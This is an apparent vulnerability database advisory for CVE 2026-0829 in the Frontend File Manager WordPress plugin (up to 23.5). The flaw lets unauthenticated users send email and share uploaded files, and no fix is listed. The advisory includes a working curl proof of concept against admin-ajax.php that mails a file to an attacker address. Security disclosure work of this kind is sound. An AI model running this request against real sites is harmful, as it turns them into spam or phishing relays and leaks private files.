Frontend File Manager Plugin <= 23.5 – Unauthenticated Arbitrary Email Sending | CVE 2026-0829 | Plugin Vulnerabilities

Description

The plugin allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.

Proof of Concept

curl -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfm_send_file_in_email" \
  -d "file_id=1" \
  -d "emailaddress=attacker@example.com" \
  -d "message=PoC"

Expected response: {"success":true,"data":"File is shared successfully"}

Affects Plugins

nmedia-user-file-uploader

No known fix

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

yiğit ibrahim sağlam

Submitter

yiğit ibrahim sağlam

Submitter website

https://ibrahimsql.com

Submitter twitter

Verified

Yes

WPVDB ID

57d62cea-cfb8-4421-a209-e64a015ad225

Timeline

Publicly Published

2026-01-27 (about 21 days ago)

Added

2026-01-27 (about 21 days ago)

Last Updated

2026-01-27 (about 21 days ago)

Other

Published

Title

Published

2024-12-14

Title

WooCommerce Basic Ordernumbers <= 1.4.4 - Missing Authorization

Published

2025-12-05

Title

weDocs < 2.1.15 - Subscriber+ Settings Update

Published

2025-11-05

Title

Better Find and Replace < 1.7.8 - Missing Authorization

Published

2025-12-17

Title

Watu Quiz < 3.4.5.1 - Missing Authorization

Published

2025-12-31

Title

RestroPress <= 3.2.4.2 - Missing Authorization